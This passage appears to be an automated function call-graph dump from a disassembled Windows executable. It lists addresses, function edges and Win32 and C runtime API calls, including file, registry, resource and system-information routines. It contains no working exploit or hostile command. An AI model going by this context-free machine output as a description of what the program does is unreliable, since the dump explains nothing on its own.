96372 42274e 96130->96372 96132 422919 96132->95907 96136 3de536 __FrameHandler3::FrameUnwindToState 96133->96136 96134 3de544 96158 3df2d9 20 API calls __dosmaperr 96134->96158 96136->96134 96138 3de574 96136->96138 96137 3de549 96159 3e27ec 26 API calls __wsopen_s 96137->96159 96140 3de579 96138->96140 96141 3de586 96138->96141 96160 3df2d9 20 API calls __dosmaperr 96140->96160 96150 3e8061 96141->96150 96144 3de554 __wsopen_s 96144->96102 96145 3de58f 96146 3de595 96145->96146 96147 3de5a2 96145->96147 96161 3df2d9 20 API calls __dosmaperr 96146->96161 96162 3de5d4 LeaveCriticalSection __fread_nolock 96147->96162 96151 3e806d __FrameHandler3::FrameUnwindToState 96150->96151 96163 3e2f5e EnterCriticalSection 96151->96163 96153 3e807b 96164 3e80fb 96153->96164 96157 3e80ac __wsopen_s 96157->96145 96158->96137 96159->96144 96160->96144 96161->96144 96162->96144 96163->96153 96165 3e811e 96164->96165 96166 3e8177 96165->96166 96173 3e8088 96165->96173 96181 3d918d EnterCriticalSection 96165->96181 96182 3d91a1 LeaveCriticalSection 96165->96182 96183 3e4c7d 20 API calls 2 library calls 96166->96183 96168 3e8180 96184 3e29c8 96168->96184 96171 3e8189 96171->96173 96190 3e3405 11 API calls 2 library calls 96171->96190 96178 3e80b7 96173->96178 96174 3e81a8 96191 3d918d EnterCriticalSection 96174->96191 96177 3e81bb 96177->96173 96193 3e2fa6 LeaveCriticalSection 96178->96193 96180 3e80be 96180->96157 96181->96165 96182->96165 96183->96168 96185 3e29d3 RtlFreeHeap 96184->96185 96189 3e29fc __dosmaperr 96184->96189 96186 3e29e8 96185->96186 96185->96189 96192 3df2d9 20 API calls __dosmaperr 96186->96192 96188 3e29ee GetLastError 96188->96189 96189->96171 96190->96174 96191->96177 96192->96188 96193->96180 96195 3cfddb 22 API calls 96194->96195 96196 3b5734 96195->96196 96196->96112 96198 3b42bc FindResourceExW 96197->96198 96202 3b42d9 96197->96202 96199 3f35ba LoadResource 96198->96199 96198->96202 96200 3f35cf SizeofResource 96199->96200 96199->96202 96201 3f35e3 
LockResource 96200->96201 96200->96202 96201->96202 96202->96122 96204 3b512e 96203->96204 96205 3f3d90 96203->96205 96209 3dece3 96204->96209 96208->96117 96212 3deaaa 96209->96212 96211 3b513c 96211->96122 96215 3deab6 __FrameHandler3::FrameUnwindToState 96212->96215 96213 3deac2 96225 3df2d9 20 API calls __dosmaperr 96213->96225 96215->96213 96216 3deae8 96215->96216 96227 3d918d EnterCriticalSection 96216->96227 96218 3deac7 96226 3e27ec 26 API calls __wsopen_s 96218->96226 96219 3deaf4 96228 3dec0a 62 API calls 2 library calls 96219->96228 96222 3deb08 96229 3deb27 LeaveCriticalSection __fread_nolock 96222->96229 96224 3dead2 __wsopen_s 96224->96211 96225->96218 96226->96224 96227->96219 96228->96222 96229->96224 96233 3de8e1 96230->96233 96232 3b5118 96232->96130 96234 3de8ed __FrameHandler3::FrameUnwindToState 96233->96234 96235 3de92d 96234->96235 96236 3de900 ___scrt_fastfail 96234->96236 96238 3de925 __wsopen_s 96234->96238 96246 3d918d EnterCriticalSection 96235->96246 96260 3df2d9 20 API calls __dosmaperr 96236->96260 96238->96232 96239 3de937 96247 3de6f8 96239->96247 96242 3de91a 96261 3e27ec 26 API calls __wsopen_s 96242->96261 96246->96239 96251 3de70a ___scrt_fastfail 96247->96251 96253 3de727 96247->96253 96248 3de717 96335 3df2d9 20 API calls __dosmaperr 96248->96335 96250 3de71c 96336 3e27ec 26 API calls __wsopen_s 96250->96336 96251->96248 96251->96253 96258 3de76a __fread_nolock 96251->96258 96262 3de96c LeaveCriticalSection __fread_nolock 96253->96262 96254 3de886 ___scrt_fastfail 96338 3df2d9 20 API calls __dosmaperr 96254->96338 96258->96253 96258->96254 96263 3dd955 96258->96263 96270 3e8d45 96258->96270 96337 3dcf78 26 API calls 4 library calls 96258->96337 96260->96242 96261->96238 96262->96238 96264 3dd976 96263->96264 96265 3dd961 96263->96265 96264->96258 96339 3df2d9 20 API calls __dosmaperr 96265->96339 96267 3dd966 96340 3e27ec 26 API calls __wsopen_s 96267->96340 96269 3dd971 96269->96258 96271 3e8d6f 96270->96271 96272 3e8d57 
96270->96272 96274 3e90d9 96271->96274 96279 3e8db4 96271->96279 96350 3df2c6 20 API calls __dosmaperr 96272->96350 96366 3df2c6 20 API calls __dosmaperr 96274->96366 96275 3e8d5c 96351 3df2d9 20 API calls __dosmaperr 96275->96351 96278 3e90de 96367 3df2d9 20 API calls __dosmaperr 96278->96367 96280 3e8d64 96279->96280 96282 3e8dbf 96279->96282 96286 3e8def 96279->96286 96280->96258 96352 3df2c6 20 API calls __dosmaperr 96282->96352 96283 3e8dcc 96368 3e27ec 26 API calls __wsopen_s 96283->96368 96285 3e8dc4 96353 3df2d9 20 API calls __dosmaperr 96285->96353 96289 3e8e08 96286->96289 96290 3e8e2e 96286->96290 96291 3e8e4a 96286->96291 96289->96290 96325 3e8e15 96289->96325 96354 3df2c6 20 API calls __dosmaperr 96290->96354 96357 3e3820 21 API calls 2 library calls 96291->96357 96293 3e8e33 96355 3df2d9 20 API calls __dosmaperr 96293->96355 96295 3e8e61 96298 3e29c8 _free 20 API calls 96295->96298 96301 3e8e6a 96298->96301 96299 3e8e3a 96356 3e27ec 26 API calls __wsopen_s 96299->96356 96300 3e8fb3 96303 3e9029 96300->96303 96306 3e8fcc GetConsoleMode 96300->96306 96304 3e29c8 _free 20 API calls 96301->96304 96305 3e902d ReadFile 96303->96305 96307 3e8e71 96304->96307 96308 3e9047 96305->96308 96309 3e90a1 GetLastError 96305->96309 96306->96303 96310 3e8fdd 96306->96310 96311 3e8e7b 96307->96311 96312 3e8e96 96307->96312 96308->96309 96315 3e901e 96308->96315 96313 3e90ae 96309->96313 96314 3e9005 96309->96314 96310->96305 96316 3e8fe3 ReadConsoleW 96310->96316 96358 3df2d9 20 API calls __dosmaperr 96311->96358 96360 3e9424 28 API calls __wsopen_s 96312->96360 96364 3df2d9 20 API calls __dosmaperr 96313->96364 96331 3e8e45 __fread_nolock 96314->96331 96361 3df2a3 20 API calls __dosmaperr 96314->96361 96328 3e906c 96315->96328 96329 3e9083 96315->96329 96315->96331 96316->96315 96321 3e8fff GetLastError 96316->96321 96317 3e29c8 _free 20 API calls 96317->96280 96321->96314 96323 3e8e80 96359 3df2c6 20 API calls __dosmaperr 96323->96359 96324 3e90b3 96365 3df2c6 20 API 
calls __dosmaperr 96324->96365 96341 3ef89b 96325->96341 96362 3e8a61 31 API calls 3 library calls 96328->96362 96330 3e909a 96329->96330 96329->96331 96363 3e88a1 29 API calls __wsopen_s 96330->96363 96331->96317 96334 3e909f 96334->96331 96335->96250 96336->96253 96337->96258 96338->96250 96339->96267 96340->96269 96342 3ef8a8 96341->96342 96343 3ef8b5 96341->96343 96369 3df2d9 20 API calls __dosmaperr 96342->96369 96346 3ef8c1 96343->96346 96370 3df2d9 20 API calls __dosmaperr 96343->96370 96345 3ef8ad 96345->96300 96346->96300 96348 3ef8e2 96371 3e27ec 26 API calls __wsopen_s 96348->96371 96350->96275 96351->96280 96352->96285 96353->96283 96354->96293 96355->96299 96356->96331 96357->96295 96358->96323 96359->96331 96360->96325 96361->96331 96362->96331 96363->96334 96364->96324 96365->96331 96366->96278 96367->96283 96368->96280 96369->96345 96370->96348 96371->96345 96375 3de4e8 96372->96375 96374 42275d 96374->96132 96378 3de469 96375->96378 96377 3de505 96377->96374 96379 3de48c 96378->96379 96380 3de478 96378->96380 96385 3de488 __alldvrm 96379->96385 96388 3e333f 11 API calls 2 library calls 96379->96388 96386 3df2d9 20 API calls __dosmaperr 96380->96386 96382 3de47d 96387 3e27ec 26 API calls __wsopen_s 96382->96387 96385->96377 96386->96382 96387->96385 96388->96385 96389->95947 96391 3b6382 96390->96391 96397 3b63b6 __fread_nolock 96390->96397 96392 3f4a82 96391->96392 96393 3b63a9 96391->96393 96391->96397 96394 3cfddb 22 API calls 96392->96394 96401 3ba587 96393->96401 96396 3f4a91 96394->96396 96398 3cfe0b 22 API calls 96396->96398 96397->95958 96399 3f4ac5 __fread_nolock 96398->96399 96400->95959 96402 3ba59d 96401->96402 96405 3ba598 __fread_nolock 96401->96405 96403 3cfe0b 22 API calls 96402->96403 96404 3ff80f 96402->96404 96403->96405 96405->96397 96406->96000 96407->96002 96408->96053 96410 3ddbc1 96409->96410 96416 3ddbdd 96409->96416 96411 3ddbcd 96410->96411 96412 3ddbe3 96410->96412 96410->96416 96474 3df2d9 20 API calls __dosmaperr 
96411->96474 96471 3dd9cc 96412->96471 96415 3ddbd2 96475 3e27ec 26 API calls __wsopen_s 96415->96475 96416->96065 96419 3de684 __FrameHandler3::FrameUnwindToState 96418->96419 96420 3de6aa 96419->96420 96421 3de695 96419->96421 96430 3de6a5 __wsopen_s 96420->96430 96610 3d918d EnterCriticalSection 96420->96610 96627 3df2d9 20 API calls __dosmaperr 96421->96627 96423 3de69a 96628 3e27ec 26 API calls __wsopen_s 96423->96628 96426 3de6c6 96611 3de602 96426->96611 96428 3de6d1 96629 3de6ee LeaveCriticalSection __fread_nolock 96428->96629 96430->96057 96432 423013 96431->96432 96433 422fff SetFileTime CloseHandle 96431->96433 96432->96035 96433->96432 96438 422e7a 96434->96438 96435 4229c4 96435->96035 96440 3dd583 26 API calls 96435->96440 96436 3b50f5 40 API calls 96436->96438 96437 4228fe 27 API calls 96437->96438 96438->96435 96438->96436 96438->96437 96439 3b511f 64 API calls 96438->96439 96439->96438 96440->96036 96441->96044 96443 4222e7 96442->96443 96444 4222d9 96442->96444 96446 42232c 96443->96446 96447 3de5eb 29 API calls 96443->96447 96457 4222f0 96443->96457 96445 3de5eb 29 API calls 96444->96445 96445->96443 96703 422557 96446->96703 96448 422311 96447->96448 96448->96446 96450 42231a 96448->96450 96454 3de678 67 API calls 96450->96454 96450->96457 96451 422370 96452 422374 96451->96452 96453 422395 96451->96453 96456 422381 96452->96456 96459 3de678 67 API calls 96452->96459 96707 422171 96453->96707 96454->96457 96456->96457 96460 3de678 67 API calls 96456->96460 96457->96063 96457->96070 96458 42239d 96461 4223c3 96458->96461 96462 4223a3 96458->96462 96459->96456 96460->96457 96714 4223f3 96461->96714 96464 3de678 67 API calls 96462->96464 96466 4223b0 96462->96466 96464->96466 96465 4223ca 96468 4223de 96465->96468 96469 3de678 67 API calls 96465->96469 96466->96457 96467 3de678 67 API calls 96466->96467 96467->96457 96468->96457 96470 3de678 67 API calls 96468->96470 96469->96468 96470->96457 96476 3dd97b 96471->96476 96473 3dd9f0 96473->96416 
96474->96415 96475->96416 96477 3dd987 __FrameHandler3::FrameUnwindToState 96476->96477 96484 3d918d EnterCriticalSection 96477->96484 96479 3dd995 96485 3dd9f4 96479->96485 96483 3dd9b3 __wsopen_s 96483->96473 96484->96479 96493 3e49a1 96485->96493 96491 3dd9a2 96492 3dd9c0 LeaveCriticalSection __fread_nolock 96491->96492 96492->96483 96494 3dd955 __fread_nolock 26 API calls 96493->96494 96495 3e49b0 96494->96495 96496 3ef89b __fread_nolock 26 API calls 96495->96496 96497 3e49b6 96496->96497 96501 3dda09 96497->96501 96514 3e3820 21 API calls 2 library calls 96497->96514 96499 3e4a15 96500 3e29c8 _free 20 API calls 96499->96500 96500->96501 96502 3dda3a 96501->96502 96505 3dda4c 96502->96505 96508 3dda24 96502->96508 96503 3dda5a 96540 3df2d9 20 API calls __dosmaperr 96503->96540 96505->96503 96505->96508 96509 3dda85 __fread_nolock 96505->96509 96506 3dda5f 96541 3e27ec 26 API calls __wsopen_s 96506->96541 96513 3e4a56 62 API calls 96508->96513 96509->96508 96511 3dd955 __fread_nolock 26 API calls 96509->96511 96515 3e59be 96509->96515 96542 3ddc0b 96509->96542 96511->96509 96513->96491 96514->96499 96516 3e59ca __FrameHandler3::FrameUnwindToState 96515->96516 96517 3e59d2 96516->96517 96522 3e59ea 96516->96522 96602 3df2c6 20 API calls __dosmaperr 96517->96602 96519 3e5a88 96607 3df2c6 20 API calls __dosmaperr 96519->96607 96520 3e59d7 96603 3df2d9 20 API calls __dosmaperr 96520->96603 96522->96519 96525 3e5a1f 96522->96525 96524 3e5a8d 96608 3df2d9 20 API calls __dosmaperr 96524->96608 96548 3e5147 EnterCriticalSection 96525->96548 96528 3e5a95 96609 3e27ec 26 API calls __wsopen_s 96528->96609 96529 3e5a25 96531 3e5a56 96529->96531 96532 3e5a41 96529->96532 96549 3e5aa9 96531->96549 96604 3df2d9 20 API calls __dosmaperr 96532->96604 96533 3e59df __wsopen_s 96533->96509 96536 3e5a46 96605 3df2c6 20 API calls __dosmaperr 96536->96605 96537 3e5a51 96606 3e5a80 LeaveCriticalSection __wsopen_s 96537->96606 96540->96506 96541->96508 96543 3ddc23 96542->96543 96547 
3ddc1f 96542->96547 96544 3dd955 __fread_nolock 26 API calls 96543->96544 96543->96547 96545 3ddc43 96544->96545 96546 3e59be __wsopen_s 62 API calls 96545->96546 96546->96547 96547->96509 96548->96529 96550 3e5ad7 96549->96550 96587 3e5ad0 96549->96587 96551 3e5afa 96550->96551 96552 3e5adb 96550->96552 96556 3e5b4b 96551->96556 96557 3e5b2e 96551->96557 96553 3df2c6 __dosmaperr 20 API calls 96552->96553 96555 3e5ae0 96553->96555 96554 3d0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96558 3e5cb1 96554->96558 96559 3df2d9 __dosmaperr 20 API calls 96555->96559 96560 3e5b61 96556->96560 96563 3e9424 __wsopen_s 28 API calls 96556->96563 96561 3df2c6 __dosmaperr 20 API calls 96557->96561 96558->96537 96562 3e5ae7 96559->96562 96564 3e564e __wsopen_s 39 API calls 96560->96564 96565 3e5b33 96561->96565 96566 3e27ec __wsopen_s 26 API calls 96562->96566 96563->96560 96567 3e5b6a 96564->96567 96568 3df2d9 __dosmaperr 20 API calls 96565->96568 96566->96587 96569 3e5b6f 96567->96569 96570 3e5ba8 96567->96570 96587->96554 96602->96520 96603->96533 96604->96536 96605->96537 96606->96533 96607->96524 96608->96528 96609->96533 96610->96426 96612 3de60f 96611->96612 96613 3de624 96611->96613 96649 3df2d9 20 API calls __dosmaperr 96612->96649 96615 3ddc0b 62 API calls 96613->96615 96620 3de61f 96613->96620 96617 3de638 96615->96617 96616 3de614 96650 3e27ec 26 API calls __wsopen_s 96616->96650 96630 3e4d7a 96617->96630 96620->96428 96622 3dd955 __fread_nolock 26 API calls 96623 3de646 96622->96623 96634 3e862f 96623->96634 96626 3e29c8 _free 20 API calls 96626->96620 96627->96423 96628->96430 96629->96430 96631 3e4d90 96630->96631 96633 3de640 96630->96633 96632 3e29c8 _free 20 API calls 96631->96632 96631->96633 96632->96633 96633->96622 96635 3e863e 96634->96635 96636 3e8653 96634->96636 96654 3df2c6 20 API calls __dosmaperr 96635->96654 96638 3e868e 96636->96638 96642 3e867a 96636->96642 96656 3df2c6 20 API calls __dosmaperr 96638->96656 96639 3e8643 
96655 3df2d9 20 API calls __dosmaperr 96639->96655 96651 3e8607 96642->96651 96643 3e8693 96657 3df2d9 20 API calls __dosmaperr 96643->96657 96646 3de64c 96646->96620 96646->96626 96647 3e869b 96658 3e27ec 26 API calls __wsopen_s 96647->96658 96649->96616 96650->96620 96659 3e8585 96651->96659 96653 3e862b 96653->96646 96654->96639 96655->96646 96656->96643 96657->96647 96658->96646 96660 3e8591 __FrameHandler3::FrameUnwindToState 96659->96660 96670 3e5147 EnterCriticalSection 96660->96670 96662 3e859f 96663 3e85c6 96662->96663 96664 3e85d1 96662->96664 96671 3e86ae 96663->96671 96686 3df2d9 20 API calls __dosmaperr 96664->96686 96667 3e85cc 96687 3e85fb LeaveCriticalSection __wsopen_s 96667->96687 96669 3e85ee __wsopen_s 96669->96653 96670->96662 96688 3e53c4 96671->96688 96673 3e86c4 96701 3e5333 21 API calls 2 library calls 96673->96701 96674 3e86be 96674->96673 96675 3e86f6 96674->96675 96677 3e53c4 __wsopen_s 26 API calls 96674->96677 96675->96673 96678 3e53c4 __wsopen_s 26 API calls 96675->96678 96681 3e86ed 96677->96681 96682 3e8702 FindCloseChangeNotification 96678->96682 96679 3e871c 96680 3e873e 96679->96680 96702 3df2a3 20 API calls __dosmaperr 96679->96702 96680->96667 96684 3e53c4 __wsopen_s 26 API calls 96681->96684 96682->96673 96685 3e870e GetLastError 96682->96685 96684->96675 96685->96673 96686->96667 96687->96669 96689 3e53e6 96688->96689 96690 3e53d1 96688->96690 96693 3df2c6 __dosmaperr 20 API calls 96689->96693 96696 3e540b 96689->96696 96691 3df2c6 __dosmaperr 20 API calls 96690->96691 96692 3e53d6 96691->96692 96695 3df2d9 __dosmaperr 20 API calls 96692->96695 96694 3e5416 96693->96694 96697 3df2d9 __dosmaperr 20 API calls 96694->96697 96698 3e53de 96695->96698 96696->96674 96699 3e541e 96697->96699 96698->96674 96700 3e27ec __wsopen_s 26 API calls 96699->96700 96700->96698 96701->96679 96702->96680 96704 422565 __fread_nolock 96703->96704 96705 42257c 96703->96705 96704->96451 96706 3de8c4 __fread_nolock 40 API calls 96705->96706 
96706->96704 96708 3dea0c ___std_exception_copy 21 API calls 96707->96708 96709 42217f 96708->96709 96710 3dea0c ___std_exception_copy 21 API calls 96709->96710 96711 422190 96710->96711 96712 3dea0c ___std_exception_copy 21 API calls 96711->96712 96713 42219c 96712->96713 96713->96458 96721 422408 96714->96721 96715 4224c0 96726 422724 96715->96726 96717 4221cc 40 API calls 96717->96721 96718 4224c7 96718->96465 96721->96715 96721->96717 96721->96718 96722 422606 96721->96722 96730 422269 40 API calls 96721->96730 96723 42261d 96722->96723 96725 422617 96722->96725 96723->96721 96723->96723 96725->96723 96731 4226d7 96725->96731 96727 422731 96726->96727 96728 422742 96726->96728 96729 3ddbb3 65 API calls 96727->96729 96728->96718 96729->96728 96730->96721 96732 422703 96731->96732 96733 422714 96731->96733 96734 3ddbb3 65 API calls 96732->96734 96733->96725 96734->96733 96736 3b33fe _wcslen 96735->96736 96737 3f311d 96736->96737 96738 3b3411 96736->96738 96740 3cfddb 22 API calls 96737->96740 96739 3ba587 22 API calls 96738->96739 96742 3b341e __fread_nolock 96739->96742 96741 3f3127 96740->96741 96743 3cfe0b 22 API calls 96741->96743 96742->96077 96744 3f3157 __fread_nolock 96743->96744 96745->96093 96747 41d4d5 96746->96747 96748 41dbdc GetFileAttributesW 96746->96748 96747->95347 96748->96747 96749 41dbe8 FindFirstFileW 96748->96749 96749->96747 96750 41dbf9 FindClose 96749->96750 96750->96747 96752 3b6270 22 API calls 96751->96752 96774 3b9eb5 96752->96774 96753 3b9fd2 96781 3ba4a1 96753->96781 96755 3b9fec 96755->95652 96758 3ff7c4 96793 4196e2 84 API calls __wsopen_s 96758->96793 96759 3ff699 96765 3cfddb 22 API calls 96759->96765 96761 3ba405 96761->96755 96794 4196e2 84 API calls __wsopen_s 96761->96794 96764 3ba6c3 22 API calls 96764->96774 96767 3ff754 96765->96767 96766 3ff7d2 96768 3ba4a1 22 API calls 96766->96768 96770 3cfe0b 22 API calls 96767->96770 96769 3ff7e8 96768->96769 96769->96755 96771 3ba12c __fread_nolock 96770->96771 96771->96758 
96771->96761 96773 3ba587 22 API calls 96773->96774 96774->96753 96774->96758 96774->96759 96774->96761 96774->96764 96774->96771 96774->96773 96775 3baec9 22 API calls 96774->96775 96778 3ba4a1 22 API calls 96774->96778 96780 3b4573 41 API calls _wcslen 96774->96780 96790 3b48c8 23 API calls 96774->96790 96791 3b49bd 22 API calls __fread_nolock 96774->96791 96792 3ba673 22 API calls 96774->96792 96776 3ba0db CharUpperBuffW 96775->96776 96789 3ba673 22 API calls 96776->96789 96778->96774 96779->95656 96780->96774 96782 3ba52b 96781->96782 96787 3ba4b1 __fread_nolock 96781->96787 96784 3cfe0b 22 API calls 96782->96784 96783 3cfddb 22 API calls 96785 3ba4b8 96783->96785 96784->96787 96786 3cfddb 22 API calls 96785->96786 96788 3ba4d6 96785->96788 96786->96788 96787->96783 96788->96755 96789->96774 96790->96774 96791->96774 96792->96774 96793->96766 96794->96755 96796 3bae01 96795->96796 96799 3bae1c ISource 96795->96799 96797 3baec9 22 API calls 96796->96797 96798 3bae09 CharUpperBuffW 96797->96798 96798->96799 96799->95360 96801 3bacae 96800->96801 96803 3bacd1 96801->96803 96830 42359c 82 API calls __wsopen_s 96801->96830 96803->95401 96805 3ffadb 96804->96805 96806 3bad92 96804->96806 96807 3cfddb 22 API calls 96806->96807 96808 3bad99 96807->96808 96831 3badcd 96808->96831 96811->95412 96812->95408 96813->95408 96814->95364 96815->95415 96816->95378 96817->95415 96818->95415 96819->95401 96820->95401 96821->95401 96822->95401 96823->95401 96824->95401 96825->95391 96826->95415 96827->95402 96828->95409 96829->95415 96830->96803 96835 3baddd 96831->96835 96832 3badb6 96832->95401 96833 3cfddb 22 API calls 96833->96835 96834 3ba961 22 API calls 96834->96835 96835->96832 96835->96833 96835->96834 96836 3ba8c7 22 API calls 96835->96836 96837 3badcd 22 API calls 96835->96837 96836->96835 96837->96835 96838->95425 96839->95425 96840->95430 96841->95430 96842->95424 96843->95430 96844 3b105b 96849 3b344d 96844->96849 96846 3b106a 96880 3d00a3 29 API calls __onexit 
96846->96880 96848 3b1074 96850 3b345d __wsopen_s 96849->96850 96851 3ba961 22 API calls 96850->96851 96852 3b3513 96851->96852 96881 3b3a5a 96852->96881 96854 3b351c 96888 3b3357 96854->96888 96857 3b33c6 22 API calls 96858 3b3535 96857->96858 96894 3b515f 96858->96894 96861 3ba961 22 API calls 96862 3b354d 96861->96862 96863 3ba6c3 22 API calls 96862->96863 96864 3b3556 RegOpenKeyExW 96863->96864 96865 3f3176 RegQueryValueExW 96864->96865 96868 3b3578 96864->96868 96866 3f320c RegCloseKey 96865->96866 96867 3f3193 96865->96867 96866->96868 96879 3f321e _wcslen 96866->96879 96869 3cfe0b 22 API calls 96867->96869 96868->96846 96870 3f31ac 96869->96870 96871 3b5722 22 API calls 96870->96871 96872 3f31b7 RegQueryValueExW 96871->96872 96873 3f31d4 96872->96873 96876 3f31ee ISource 96872->96876 96874 3b6b57 22 API calls 96873->96874 96874->96876 96875 3b4c6d 22 API calls 96875->96879 96876->96866 96877 3b9cb3 22 API calls 96877->96879 96878 3b515f 22 API calls 96878->96879 96879->96868 96879->96875 96879->96877 96879->96878 96880->96848 96900 3f1f50 96881->96900 96884 3b9cb3 22 API calls 96885 3b3a8d 96884->96885 96902 3b3aa2 96885->96902 96887 3b3a97 96887->96854 96889 3f1f50 __wsopen_s 96888->96889 96890 3b3364 GetFullPathNameW 96889->96890 96891 3b3386 96890->96891 96892 3b6b57 22 API calls 96891->96892 96893 3b33a4 96892->96893 96893->96857 96895 3b516e 96894->96895 96899 3b518f __fread_nolock 96894->96899 96897 3cfe0b 22 API calls 96895->96897 96896 3cfddb 22 API calls 96898 3b3544 96896->96898 96897->96899 96898->96861 96899->96896 96901 3b3a67 GetModuleFileNameW 96900->96901 96901->96884 96903 3f1f50 __wsopen_s 96902->96903 96904 3b3aaf GetFullPathNameW 96903->96904 96905 3b3ae9 96904->96905 96906 3b3ace 96904->96906 96907 3ba6c3 22 API calls 96905->96907 96908 3b6b57 22 API calls 96906->96908 96909 3b3ada 96907->96909 96908->96909 96912 3b37a0 96909->96912 96913 3b37ae 96912->96913 96914 3b93b2 22 API calls 96913->96914 96915 3b37c2 96914->96915 96915->96887 
96916 403a41 96920 4210c0 96916->96920 96918 403a4c 96919 4210c0 53 API calls 96918->96919 96919->96918 96921 4210fa 96920->96921 96926 4210cd 96920->96926 96921->96918 96922 4210fc 96932 3cfa11 53 API calls 96922->96932 96924 421101 96925 3b7510 53 API calls 96924->96925 96927 421108 96925->96927 96926->96921 96926->96922 96926->96924 96929 4210f4 96926->96929 96928 3b6350 22 API calls 96927->96928 96928->96921 96931 3bb270 39 API calls 96929->96931 96931->96921 96932->96924 96933 35223b0 96947 3520000 96933->96947 96935 352246e 96950 35222a0 96935->96950 96953 35234a0 GetPEB 96947->96953 96949 352068b 96949->96935 96951 35222a9 Sleep 96950->96951 96952 35222b7 96951->96952 96954 35234ca 96953->96954 96954->96949 96955 3b1098 96960 3b42de 96955->96960 96959 3b10a7 96961 3ba961 22 API calls 96960->96961 96962 3b42f5 GetVersionExW 96961->96962 96963 3b6b57 22 API calls 96962->96963 96964 3b4342 96963->96964 96965 3b93b2 22 API calls 96964->96965 96974 3b4378 96964->96974 96966 3b436c 96965->96966 96968 3b37a0 22 API calls 96966->96968 96967 3b441b GetCurrentProcess IsWow64Process 96969 3b4437 96967->96969 96968->96974 96970 3b444f LoadLibraryA 96969->96970 96971 3f3824 GetSystemInfo 96969->96971 96972 3b449c GetSystemInfo 96970->96972 96973 3b4460 GetProcAddress 96970->96973 96977 3b4476 96972->96977 96973->96972 96976 3b4470 GetNativeSystemInfo 96973->96976 96974->96967 96975 3f37df 96974->96975 96976->96977 96978 3b447a FreeLibrary 96977->96978 96979 3b109d 96977->96979 96978->96979 96980 3d00a3 29 API calls __onexit 96979->96980 96980->96959 96981 3e90fa 96982 3e9107 96981->96982 96986 3e911f 96981->96986 97031 3df2d9 20 API calls __dosmaperr 96982->97031 96984 3e910c 97032 3e27ec 26 API calls __wsopen_s 96984->97032 96987 3e917a 96986->96987 96995 3e9117 96986->96995 97033 3efdc4 21 API calls 2 library calls 96986->97033 96988 3dd955 __fread_nolock 26 API calls 96987->96988 96990 3e9192 96988->96990 97001 3e8c32 96990->97001 96992 3e9199 96993 3dd955 
__fread_nolock 26 API calls 96992->96993 96992->96995 96994 3e91c5 96993->96994 96994->96995 96996 3dd955 __fread_nolock 26 API calls 96994->96996 96997 3e91d3 96996->96997 96997->96995 96998 3dd955 __fread_nolock 26 API calls 96997->96998 96999 3e91e3 96998->96999 97000 3dd955 __fread_nolock 26 API calls 96999->97000 97000->96995 97002 3e8c3e __FrameHandler3::FrameUnwindToState 97001->97002 97003 3e8c5e 97002->97003 97004 3e8c46 97002->97004 97006 3e8d24 97003->97006 97011 3e8c97 97003->97011 97035 3df2c6 20 API calls __dosmaperr 97004->97035 97042 3df2c6 20 API calls __dosmaperr 97006->97042 97008 3e8c4b 97036 3df2d9 20 API calls __dosmaperr 97008->97036 97009 3e8d29 97043 3df2d9 20 API calls __dosmaperr 97009->97043 97014 3e8cbb 97011->97014 97015 3e8ca6 97011->97015 97013 3e8c53 __wsopen_s 97013->96992 97034 3e5147 EnterCriticalSection 97014->97034 97037 3df2c6 20 API calls __dosmaperr 97015->97037 97018 3e8cc1 97020 3e8cdd 97018->97020 97021 3e8cf2 97018->97021 97019 3e8cab 97038 3df2d9 20 API calls __dosmaperr 97019->97038 97039 3df2d9 20 API calls __dosmaperr 97020->97039 97026 3e8d45 __fread_nolock 38 API calls 97021->97026 97024 3e8cb3 97044 3e27ec 26 API calls __wsopen_s 97024->97044 97028 3e8ced 97026->97028 97027 3e8ce2 97040 3df2c6 20 API calls __dosmaperr 97027->97040 97041 3e8d1c LeaveCriticalSection __wsopen_s 97028->97041 97031->96984 97032->96995 97033->96987 97034->97018 97035->97008 97036->97013 97037->97019 97038->97024 97039->97027 97040->97028 97041->97013 97042->97009 97043->97024 97044->97013 97045 3bf7bf 97046 3bf7d3 97045->97046 97047 3bfcb6 97045->97047 97048 3bfcc2 97046->97048 97050 3cfddb 22 API calls 97046->97050 97082 3baceb 23 API calls ISource 97047->97082 97083 3baceb 23 API calls ISource 97048->97083 97052 3bf7e5 97050->97052 97052->97048 97053 3bf83e 97052->97053 97054 3bfd3d 97052->97054 97056 3c1310 239 API calls 97053->97056 97072 3bed9d ISource 97053->97072 97084 421155 22 API calls 97054->97084 97077 3bec76 ISource 
97056->97077 97058 3bfef7 97064 3ba8c7 22 API calls 97058->97064 97058->97072 97059 3cfddb 22 API calls 97059->97077 97061 404600 97067 3ba8c7 22 API calls 97061->97067 97061->97072 97062 404b0b 97086 42359c 82 API calls __wsopen_s 97062->97086 97063 3ba8c7 22 API calls 97063->97077 97064->97072 97067->97072 97069 3d0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97069->97077 97070 3bfbe3 97070->97072 97074 404bdc 97070->97074 97079 3bf3ae ISource 97070->97079 97071 3ba961 22 API calls 97071->97077 97073 3d00a3 29 API calls pre_c_initialization 97073->97077 97087 42359c 82 API calls __wsopen_s 97074->97087 97076 404beb 97088 42359c 82 API calls __wsopen_s 97076->97088 97077->97058 97077->97059 97077->97061 97077->97062 97077->97063 97077->97069 97077->97070 97077->97071 97077->97072 97077->97073 97077->97076 97078 3d01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97077->97078 97077->97079 97080 3c01e0 239 API calls 2 library calls 97077->97080 97081 3c06a0 41 API calls ISource 97077->97081 97078->97077 97079->97072 97085 42359c 82 API calls __wsopen_s 97079->97085 97080->97077 97081->97077 97082->97048 97083->97054 97084->97072 97085->97072 97086->97072 97087->97076 97088->97072 97089 3d03fb 97090 3d0407 __FrameHandler3::FrameUnwindToState 97089->97090 97118 3cfeb1 97090->97118 97092 3d040e 97093 3d0561 97092->97093 97096 3d0438 97092->97096 97145 3d083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97093->97145 97095 3d0568 97146 3d4e52 28 API calls _abort 97095->97146 97107 3d0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97096->97107 97129 3e247d 97096->97129 97098 3d056e 97147 3d4e04 28 API calls _abort 97098->97147 97102 3d0576 97103 3d0457 97105 3d04d8 97137 3d0959 97105->97137 97107->97105 97141 3d4e1a 38 API calls 3 library calls 97107->97141 97109 3d04de 97110 
